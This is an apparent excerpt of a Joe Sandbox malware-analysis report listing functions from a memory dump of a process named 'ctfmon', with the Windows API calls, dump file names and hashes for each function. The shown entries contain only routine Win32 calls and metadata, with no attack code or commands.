SendMessageA.USER32(?,00001943,00000000,?), ref: 0041CD87
RemovePropA.USER32(?,?), ref: 0041CD9D

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: MessagePropSend$Remove
String ID:
API String ID: 2793251306-0
Opcode ID: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
Instruction ID: cdf8bf3b115a00345220dc762a3e71ecc87d4dae19ac6484943eac8265a5b6fa
Opcode Fuzzy Hash: daef66e987881a51772ba138ed3b8eadad13992640693e56edf310bc52bb590e
Instruction Fuzzy Hash: FD11AB796403107AE210AB14AC45FFF775CEB99715F404439FD1496280E27CA94A8BBF

Function 00429870 Relevance: 6.1, APIs: 4, Instructions: 61stringwindowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00429875
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,00000000,00000000,00000000,?,?,00435D10,00000000,?,0042AC21,00000000), ref: 004298E5
lstrcpynW.KERNEL32(0042AC21,00000000,?,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 00429902
LocalFree.KERNEL32(00000000,?,00435D10,00000000,?,0042AC21,00000000,?,?,?,?,00000000), ref: 0042990B

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: FormatFreeH_prologLocalMessagelstrcpyn
String ID:
API String ID: 1069405352-0
Opcode ID: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
Instruction ID: fdd3b3ea3dca44e7a97c76a848adebdcda81641acace6f1e1dd778b80c94f713
Opcode Fuzzy Hash: 5b21970f33e5bf9ba5f39fdf96f7e2f0bfcdcf2c450e68c32a7aaf4442d72fee
Instruction Fuzzy Hash: 5C112232610328FBCB20AF91EC05AEF7FA8FF08760F50441AF9089A190D3759A51CBD8

Function 0041CDC1 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0041CDE3
GetWindow.USER32(00000000,00000005), ref: 0041CDFF
GetWindow.USER32(00000000,00000002), ref: 0041CE15
GetWindow.USER32(00000000,00000002), ref: 0041CE20

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
Instruction ID: f7176755ff76171dbc3ca36412ed8f896c65f43d2b9e194da37f980429bdcab7
Opcode Fuzzy Hash: 42e444434839b07a5d789e75d3d5782edf4c2f1b92dbbcb6e8ae979b3e843519
Instruction Fuzzy Hash: 59F0A47738070122D222756A7CC6FAB7B988BD2B51F50043AF600A6282EE59E855426D

Function 0041C380 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CallNextHookEx.USER32(00000000,?,?,?), ref: 0041C39B
UnhookWindowsHookEx.USER32(00000000), ref: 0041C3B4
GetWindowLongA.USER32(?,000000F0), ref: 0041C3CB
SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 0041C3F5

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
String ID:
API String ID: 4187046592-0
Opcode ID: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
Instruction ID: e56733217a63c98b9cfcbaa9d3ee52952c096190bbd855f3486cba2e69e87e11
Opcode Fuzzy Hash: 16c23afb695debf94ac363d4e9ad2ba31dec4502738a3c047efa33ae589c78b7
Instruction Fuzzy Hash: B91133B5600200AFD314DF54ECA4E6B77E5AB98314F40843DF545C33A0D774E848CB55

Function 0041CEB1 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0041CEE5
GetWindowLongA.USER32(?,000000F0), ref: 0041CEF2
SetTextColor.GDI32(?,?), ref: 0041CF0F
SetBkColor.GDI32(?,?), ref: 0041CF1D

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ColorWindow$LongText
String ID:
API String ID: 3945788684-0
Opcode ID: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
Instruction ID: 333cb50309b1e51d381b8678f90b3801f6ee55970ce0cf9ad49621ef8d753c56
Opcode Fuzzy Hash: da9316b0ad6bc5c7f01329db74796b83aa79ab07025d310c587ae31626b05bd0
Instruction Fuzzy Hash: FD01DD36249210ABD730D764BCC8DEF7795EB62721F14052BEA41D31D4C724A9C7C65D

Function 004254BA Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 004254EE
GetCurrentProcess.KERNEL32(?,00000000), ref: 004254F4
DuplicateHandle.KERNEL32(00000000), ref: 004254F7
GetLastError.KERNEL32(00000000), ref: 00425511

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
Instruction ID: ba12cf247d713ca83e744a91bb1c1a492d77c11568612e8c832d1772640133eb
Opcode Fuzzy Hash: 3407db3102113361431f74ecb046592ffe5098ecf32879b26f542b474e9f7b4b
Instruction Fuzzy Hash: 5901FC31700210BBEB10ABA5EC8AF1ABB9DDF44711F544426F519C7281EAB4DC408B64

Function 0041C860 Relevance: 6.1, APIs: 4, Instructions: 52threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041C866
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041C873
UnhookWindowsHookEx.USER32(?), ref: 0041C8B6
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041C8FB

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
Instruction ID: fe24c6a5f78cf2ac84ca5597e3b7d88d370af96ecf399c2d86962ad3691242d6
Opcode Fuzzy Hash: 9e0b65522af4578cecc2fb3f0b031ed18366c8c8f23206f40984a0bcafa8954b
Instruction Fuzzy Hash: 20119135690208EFC730EF65ECC46EA73A5FB1130AF60143AE60683591E735B89ADB94

Function 0042317F Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 0042318D
SendMessageW.USER32(00000000,?,?,?), ref: 004231C3
GetTopWindow.USER32(00000000), ref: 004231D0
GetWindow.USER32(00000000,00000002), ref: 004231EE

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
Instruction ID: d55262b01c94f31a90e2b1312f8a616a94e02ae52ed97f2f18e0d229c57d5f04
Opcode Fuzzy Hash: 2815e57003d9db41e0423e2bf2b31ad9364a6d32c4f24d28b7bef1363e754136
Instruction Fuzzy Hash: 8301E936201229BBCF126F91AC05EEF3B7AAF05351F844516FA0451124C73ECA72EBA9

Function 00423106 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00423111
GetTopWindow.USER32(00000000), ref: 00423124
GetTopWindow.USER32(?), ref: 00423154
GetWindow.USER32(00000000,00000002), ref: 0042316F

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
Instruction ID: 345862615f9688ebf3cdbf4b66b4982080435a2b4c306f56a0d53421e26843f6
Opcode Fuzzy Hash: 9c3072a1c57e75ce35e75a7a0718f38c470931357267061715886ecfb6dfcf54
Instruction Fuzzy Hash: CB018435301139778F222F62AC00EBF7A79AF14392F854126FD0095214D73DCA3296DD

Function 00420C86 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,?,?), ref: 00420CAE
GetFocus.USER32 ref: 00420CC1
GetParent.USER32(?), ref: 00420CCF
GetNextDlgTabItem.USER32(?,?,00000000), ref: 00420CEB

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
Instruction ID: 8a4b78d4f47e5053a81751d92e7ee6ced98987c858b46bcdd7bf6efd082f8e31
Opcode Fuzzy Hash: 955f1638288baaf5aef36f1df07ab6bbe9fc4d38c7aa228e1d844c59a277cbca
Instruction Fuzzy Hash: 16113C713006109BDB38AF21E859B2BB7F5AF90314FA0462EE546875A1CB78E891CB59

Function 0041CAA0 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041CAA6
EnterCriticalSection.KERNEL32(00540EE0), ref: 0041CAB3
UnhookWindowsHookEx.USER32(?), ref: 0041CAEA
LeaveCriticalSection.KERNEL32(00540EE0), ref: 0041CB29

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
Instruction ID: 73ecd1883983c7791e4a145524bf18d34c630e1f3d92ae3c2823ecf711c72ab0
Opcode Fuzzy Hash: 3ae19170d0fde3a2f46e599b63ae72609a37c3c1ceb4e8870ccf4631f519f54f
Instruction Fuzzy Hash: 3B01C075290608AFC730DF65FCC95EA33A4FB01349B20147AE606C3591E735B8AACF90

Function 00427330 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0042735C
RegCloseKey.ADVAPI32(00000000,?,?), ref: 00427365
wsprintfW.USER32 ref: 00427381
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0042739A

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
Instruction ID: 6d4ab68f11891ff308c174a238285f84ccdd3e51e257b8ace891e9d2ef57e05c
Opcode Fuzzy Hash: fc99b9af46ba9a1375285de4589dcd498f93602ba153ff3f4116a39f089e6061
Instruction Fuzzy Hash: EA016272600224BBCF219FA4EC09FDE37A9AF08714F844026FE15E6190E7B4D511DB9C

Function 004237B3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(00000000,0000000C,?), ref: 004237F1
SetBkColor.GDI32(00000000,00000000), ref: 004237FD
GetSysColor.USER32(00000008), ref: 0042380D
SetTextColor.GDI32(00000000,?), ref: 00423817

Part of subcall function 00426950: GetWindowLongW.USER32(00000000,000000F0), ref: 00426961

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
Instruction ID: 996a509eb5483e03d1280d7cc741f4f8e1f151524dd7178acde86eebcbf6a08c
Opcode Fuzzy Hash: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
Instruction Fuzzy Hash: 13011E30600155AEDF21AF54EC45AAE3BF5AB00342F944522FA02C91A0CB78CE91D69A

Function 004265E6 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
Instruction ID: 5e34c4cd6609403dc149269c458482475ccf921670738db4690db06b0d034127
Opcode Fuzzy Hash: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
Instruction Fuzzy Hash: D3F01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94

Function 00426A3A Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00426A47
GetWindowTextW.USER32(?,?,00000100), ref: 00426A63
lstrcmpW.KERNEL32(?,?), ref: 00426A77
SetWindowTextW.USER32(?,?), ref: 00426A87

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
Instruction ID: c0d20ed1f89d7020bcb479a82dbdd8d31feb51cd73047c170cfc194cd6cd2529
Opcode Fuzzy Hash: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
Instruction Fuzzy Hash: D4F01235A00129BBDF216F64EC88ADE7B69FB05390F448161F819E1160EB35DD568B98

Function 00429532 Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00429554
GetTickCount.KERNEL32 ref: 00429561
CoFreeUnusedLibraries.OLE32 ref: 00429570
GetTickCount.KERNEL32 ref: 00429576

Part of subcall function 004294D7: CoFreeUnusedLibraries.OLE32 ref: 0042951F
Part of subcall function 004294D7: OleUninitialize.OLE32 ref: 00429525

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: CountTick$FreeLibrariesUnused$Uninitialize
String ID:
API String ID: 685759847-0
Opcode ID: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
Instruction ID: 909b3d72e97e5b8f4fa77f634aeb50083d73612e72484a6c6d3d5ea4d5bcd909
Opcode Fuzzy Hash: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
Instruction Fuzzy Hash: 60E01271E05125FBC711AF60FD8865E37A0EB14311F905877D04192264C7785C85DF9D

Function 00407B04 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00407B09
VariantClear.OLEAUT32(?), ref: 00407C8E

Strings

@, xrefs: 00407B56

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ClearH_prologVariant
String ID: @
API String ID: 1166855276-2766056989
Opcode ID: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
Instruction ID: b858331317e13cfe4e871a22f7291cb985bca7952d51c674c1c62d25b1df6737
Opcode Fuzzy Hash: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
Instruction Fuzzy Hash: 3C51A370E002199FDB14CFA9C888AEEB7F9FF48304F20856AE516E7251E774A906CF50

Function 0041803B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?), ref: 0041804F

Strings

, xrefs: 00418074
, xrefs: 00418098

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
